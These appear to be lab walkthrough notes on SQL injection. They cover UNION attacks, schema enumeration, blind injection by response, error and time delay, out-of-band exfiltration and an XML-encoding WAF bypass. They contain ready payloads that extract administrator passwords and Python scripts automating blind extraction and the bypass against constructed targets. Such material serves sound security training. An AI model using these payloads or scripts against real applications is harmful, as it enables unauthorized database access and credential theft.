labs
Retrieving hidden data
Lab - 1: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
Subverting application logic
Lab - 2 : SQL injection vulnerability allowing login bypass
UNION attack
Lab - 3: SQL injection UNION attack, determining the number of columns returned by the query
GET /filter?category=Gifts'+ORDER+BY+4-- HTTP/1.1
returns an error while ORDER BY 3 does not, so the original query returns exactly 3 columns.
Lab - 4: SQL injection UNION attack, finding a column containing text
GET /filter?category=Tech+gifts'+ORDER+BY+4-- HTTP/1.1
returns an error, so the query returns 3 columns. GET /filter?category=Tech+gifts'+UNION+SELECT+'a',NULL,NULL--
also returns an error: the first column does not accept string data. Move the 'a' to the next position (NULL,'a',NULL, then NULL,NULL,'a') until a request succeeds; the position that accepts 'a' without an error is the text column.
Lab - 5: SQL injection UNION attack, retrieving data from other tables
The database contains a different table called users, with columns called username and password.
Repeating the steps from the labs above shows that the query returns 2 columns, both of them text, so both values fit one per column: ' UNION SELECT username, password FROM users--
Lab - 6: SQL injection UNION attack, retrieving multiple values in a single column
The database contains a different table called users, with columns called username and password.
Repeating the steps from the labs above shows that the query returns 2 columns, of which only the second is a text column.
Two text values have to come back through that single column, so concatenate them with a separator the database supports (|| on PostgreSQL and Oracle, CONCAT() on MySQL, + on Microsoft SQL Server) and place the result in the second position, with NULL in the first.
Examining the databases
Lab - 7: SQL injection attack, querying the database type and version on Oracle
Repeating the above steps shows that the query returns 2 columns, both of them text.
On Oracle every SELECT needs a FROM clause, so
UNION SELECT NULL,NULL
does not work; use
UNION SELECT NULL,NULL FROM dual
instead (dual is Oracle's built-in one-row table). The database version is then read from the banner column of v$version, selected into one of the text columns.
Lab - 8: SQL injection attack, querying the database type and version on MySQL and Microsoft
' ORDER BY 2--
does not work here because MySQL only treats -- as a comment when it is followed by a space, and the trailing space is lost from the URL; use
' ORDER BY 2#
instead, since # is always a comment on MySQL (it is not on Microsoft SQL Server, where -- without a trailing space is fine). The version is returned by @@version on both MySQL and Microsoft SQL Server.
Lab - 9: SQL injection attack, listing the database contents on non-Oracle databases
There are 2 string datatype columns
GET /filter?category=Gifts'+UNION+SELECT+TABLE_SCHEMA,TABLE_NAME+FROM+information_schema.tables-- HTTP/1.1
lists every table together with its schema; the users table has a randomized name that differs per lab instance, here:
table_name = 'users_xvzwev'
GET /filter?category=Gifts'+UNION+SELECT+COLUMN_NAME,DATA_TYPE+FROM+information_schema.columns+WHERE+table_name='users_xvzwev'-- HTTP/1.1
columns = password_otojxu , username_gfdqod
GET /filter?category=Gifts'+UNION+SELECT+password_otojxu,username_gfdqod+FROM+users_xvzwev-- HTTP/1.1
returns every row of the users table, including the administrator's password.
Lab - 10: SQL injection attack, listing the database contents on Oracle
There are 2 string datatype columns returned
GET /filter?category=Pets'+UNION+SELECT+TABLE_NAME,'b'+FROM+all_tables-- HTTP/1.1
table_name = USERS_MZGWOV
GET /filter?category=Pets'+UNION+SELECT+COLUMN_NAME,'b'+FROM+all_tab_columns+WHERE+table_name='USERS_MZGWOV'-- HTTP/1.1
column_names = PASSWORD_HQOOJT, USERNAME_HIHHBB
GET /filter?category=Pets'+UNION+SELECT+USERNAME_HIHHBB,+PASSWORD_HQOOJT+FROM+USERS_MZGWOV-- HTTP/1.1
When finding the column names, the table name in the all_tab_columns WHERE clause is a string literal compared against the catalogue, so it is quoted and written in upper case (Oracle stores unquoted identifiers in upper case); in the final SELECT it is an identifier in the FROM clause, so it is not quoted.
Blind SQL Injection
Lab - 11: Blind SQL injection with conditional responses
The database contains a different table called users, with columns called username and password.
The TrackingId cookie is the injection point. A condition that is true keeps the Welcome back message and a condition that is false removes it: TrackingId=<value>' AND '1'='1 returns the Welcome back message, TrackingId=<value>' AND '1'='2 does not. That difference is the only signal, so every question is asked as a condition appended to the cookie value after a single quote that closes its string.
check whether the table named users exists:
' AND (SELECT 'x' FROM users LIMIT 1)='x'--
check whether the username administrator exists:
' AND (SELECT username FROM users WHERE username='administrator')='administrator'--
enumerate the length of the administrator's password:
' AND (SELECT username FROM users WHERE username='administrator' AND LENGTH(password)>1)='administrator'--
test with 2, 3, 4, 5, ...; the first N for which LENGTH(password)>N drops the Welcome back message is the length of the password.
find the administrator's password one character at a time:
' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a'--
use Burp Intruder's cluster bomb attack with two payload positions: the first is the offset inside SUBSTRING, running from 1 up to the password length; the second is the candidate character compared with ='a', taken from a-z and 0-9. The requests whose response contains Welcome back give the character at each position.
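The conditional-response extraction above, done in code instead of with Intruder's cluster bomb, as an added example that is not part of the lab notes. The vulnerable page is a constructed sqlite3 stand-in for the TrackingId lookup (the cookie value abc123, the users rows and the password are made up); the payloads are the notes' ones, with sqlite's SUBSTR in place of PostgreSQL's SUBSTRING. The same loop serves the conditional-error and time-delay labs once oracle() is replaced by a function that checks for a 500 status or a slow response.

```python
"""Added example (not from the lab notes): boolean-based blind extraction
against a constructed sqlite3 target.  Every value here is made up."""
import sqlite3
import string

db = sqlite3.connect(":memory:")
db.executescript("""
CREATE TABLE tracking(id TEXT);
INSERT INTO tracking VALUES ('abc123');
CREATE TABLE users(username TEXT, password TEXT);
INSERT INTO users VALUES ('administrator', 'x9k2m'), ('wiener', 'peter');
""")


def welcome_back(tracking_id):
    """Vulnerable page: the cookie value is concatenated into the query and
    the only visible effect is whether 'Welcome back' is shown (a row
    matched).  Query errors are swallowed, so they look like 'no row',
    which is why a missing table reads as 'false' below."""
    sql = "SELECT id FROM tracking WHERE id = '" + tracking_id + "'"
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def oracle(condition):
    """One yes/no question: the valid cookie value, a quote closing its
    string, then AND (<condition>) and a comment, as in the notes."""
    return welcome_back("abc123' AND (" + condition + ")--")


def table_exists(table):
    return oracle(f"(SELECT 'x' FROM {table} LIMIT 1)='x'")


def user_exists(user):
    return oracle(f"(SELECT username FROM users WHERE username='{user}')='{user}'")


def password_length(user, max_len=64):
    """Raise N until LENGTH(password)>N stops being true."""
    for n in range(1, max_len + 1):
        if not oracle(f"(SELECT LENGTH(password) FROM users WHERE username='{user}')>{n}"):
            return n
    raise RuntimeError("password longer than max_len")


def extract_password(user, alphabet=string.ascii_lowercase + string.digits):
    """The cluster bomb by hand: outer loop over the offset, inner loop over
    the candidate character, one request per pair."""
    out = ""
    for pos in range(1, password_length(user) + 1):
        for ch in alphabet:
            if oracle(f"(SELECT SUBSTR(password,{pos},1) FROM users "
                      f"WHERE username='{user}')='{ch}'"):
                out += ch
                break
        else:
            raise RuntimeError(f"no candidate matched at position {pos}")
    return out


if __name__ == "__main__":
    print("true/false probe:", welcome_back("abc123' AND '1'='1"), welcome_back("abc123' AND '1'='2"))
    print("users table:", table_exists("users"), "administrator:", user_exists("administrator"))
    print("password:", extract_password("administrator"))
```

One caveat carried over from the real labs: the character comparison is case-sensitive here (sqlite's default BINARY collation) and on PostgreSQL and Oracle, but MySQL's default collation compares case-insensitively, so an alphabet of a-z and 0-9 can return a lower-case letter for an upper-case one; compare against ASCII codes or use BINARY there if case matters.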
Lab - 12: Blind SQL injection with conditional errors
Check the other endpoints first: none is vulnerable to SQL injection except the TrackingId cookie.
Testing with conditional responses shows no difference, so build a subquery that only changes whether the query errors:
'||(SELECT '')||'--
returns an error, while
'||(SELECT '' FROM dual)||'--
returns 200, so the database is Oracle (a SELECT without FROM is invalid there). Checking with a table name that does not exist,
'||(SELECT '' FROM invalid_name)||'--
returns a 500 error, so an invalid query is visible as an error in the response.
check whether the table named users exists:
'||(SELECT '' FROM users WHERE ROWNUM = 1)||'
returns no error, so the users table exists.
then check with conditional errors: a CASE WHEN whose condition is false returns no error, but one whose condition is true evaluates an expression that fails and returns a 500. For example
'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
returns no error but
'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
returns error 500
check whether the username administrator exists: put username='administrator' in the CASE WHEN condition and select FROM users instead of dual. If the row exists the THEN branch runs and the query errors; if it does not exist the branch never runs and there is no error.
check the length of the password by adding LENGTH(password)>N to the same condition and increasing N until the error stops.
substring the password with SUBSTR(password,N,1)='a' in the condition (Oracle uses SUBSTR rather than SUBSTRING),
then use Burp Intruder's cluster bomb attack with two payload positions, the offset and the candidate character, as in the previous lab; the responses with a 500 status mark the matching character at each position.
Lab - 13: Blind SQL injection with time delays
The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information. The delay function is database-specific: pg_sleep(10) on PostgreSQL, SLEEP(10) on MySQL, WAITFOR DELAY '0:0:10' on Microsoft SQL Server and dbms_pipe.receive_message(('a'),10) on Oracle; the variant that delays the response also identifies the database.
Lab - 14: Blind SQL injection with time delays and information retrieval
The database contains a different table called users, with columns called username and password.
Repeating the steps above shows that the database is PostgreSQL and that the TrackingId parameter is vulnerable to time-delay injection: a pg_sleep() call inside the condition only delays the response when the condition is true.
Find the length of the password the same way, increasing N in LENGTH(password)>N until the delay stops; here it has 19 characters.
Then use Intruder to find the administrator's password, one offset and one candidate character per request. In the Intruder results window, don't forget to select the Response received column from Columns so the requests that slept stand out by response time, and run the attack with one concurrent request so delays do not overlap and get attributed to the wrong character.
Lab - 15: Blind SQL injection with out-of-band interaction
Lab - 16: Blind SQL injection with out-of-band data exfiltration
The database contains a different table called users, with columns called username and password.
The query result never reaches the response, so make the database carry it out of band: the injected subquery builds a hostname that includes the selected value and forces a DNS lookup of it, and that lookup appears in Burp Collaborator.
Check the interactions in Burp Collaborator: the administrator's password is the label prepended to the Collaborator domain in the hostname that was looked up.
Lab 17: SQL injection with filter bypass via XML encoding
This lab contains a SQL injection vulnerability in its stock check feature. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables.
The database contains a users table, which contains the usernames and passwords of registered users.
The stock check returns a unit count. Replacing a numeric value in the XML with a simple arithmetic expression still returns a unit count (512 units), so the expression was evaluated by the database and the parameter is injectable.
A plain UNION payload is blocked by the WAF with "Attack detected".
Install Hackvertor from the BApp store, select the injected SQL in the request, then right-click > Extensions > Hackvertor > Encode > dec_entities. Each character becomes a decimal XML character reference (&#NN;): the WAF pattern-matches the raw body and no longer sees the SQL keywords, while the XML parser on the server decodes the references before the value reaches the query.
Send the request; with the encoding in place the "Attack detected" response goes away and the result of the injected query comes back in the response.
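What the dec_entities step does and why it gets past the filter, as an added example that is not part of the lab notes: the request body is modelled on the lab's stock-check XML but its element names and the keyword-matching WAF are constructed for the demo, and the payload assumes a one-column UNION with || concatenation (PostgreSQL syntax) only to have something realistic to encode.

```python
"""Added example (not from the lab notes): decimal XML entity encoding as a
WAF bypass.  The request shape, element names and WAF rule are constructed."""
import re
import xml.etree.ElementTree as ET


def dec_entities(text):
    """Encode every character as a decimal character reference (&#NN;), the
    transformation Hackvertor applies under Encode > dec_entities."""
    return "".join(f"&#{ord(c)};" for c in text)


def naive_waf(body):
    """Constructed stand-in for the lab's filter: inspects the raw request
    body for SQL keywords without decoding XML entities first."""
    return bool(re.search(r"\b(UNION|SELECT)\b", body, re.IGNORECASE))


def stock_check_request(store_id):
    """Constructed stock-check body with the payload in storeId."""
    return ("<stockCheck><productId>1</productId>"
            f"<storeId>{store_id}</storeId></stockCheck>")


def server_side_store_id(body):
    """Server side: the XML parser expands the references, so the
    application receives the original string and concatenates it into SQL."""
    return ET.fromstring(body).findtext("storeId")


def run(payload="1 UNION SELECT username || '~' || password FROM users"):
    """Send the same payload raw and entity-encoded; report what the WAF
    matched on and what the server's parser handed to the application."""
    raw = stock_check_request(payload)
    encoded = stock_check_request(dec_entities(payload))
    decoded = server_side_store_id(encoded)
    return {
        "raw_blocked": naive_waf(raw),
        "encoded_blocked": naive_waf(encoded),
        "server_sees": decoded,
        "payload_intact": decoded == payload,
    }


if __name__ == "__main__":
    for k, v in run().items():
        print(f"{k}: {v}")
```

The bypass works only when the filter and the consumer disagree about decoding: a WAF that normalises XML before matching, or a server that reads the body as text without parsing it, closes this gap.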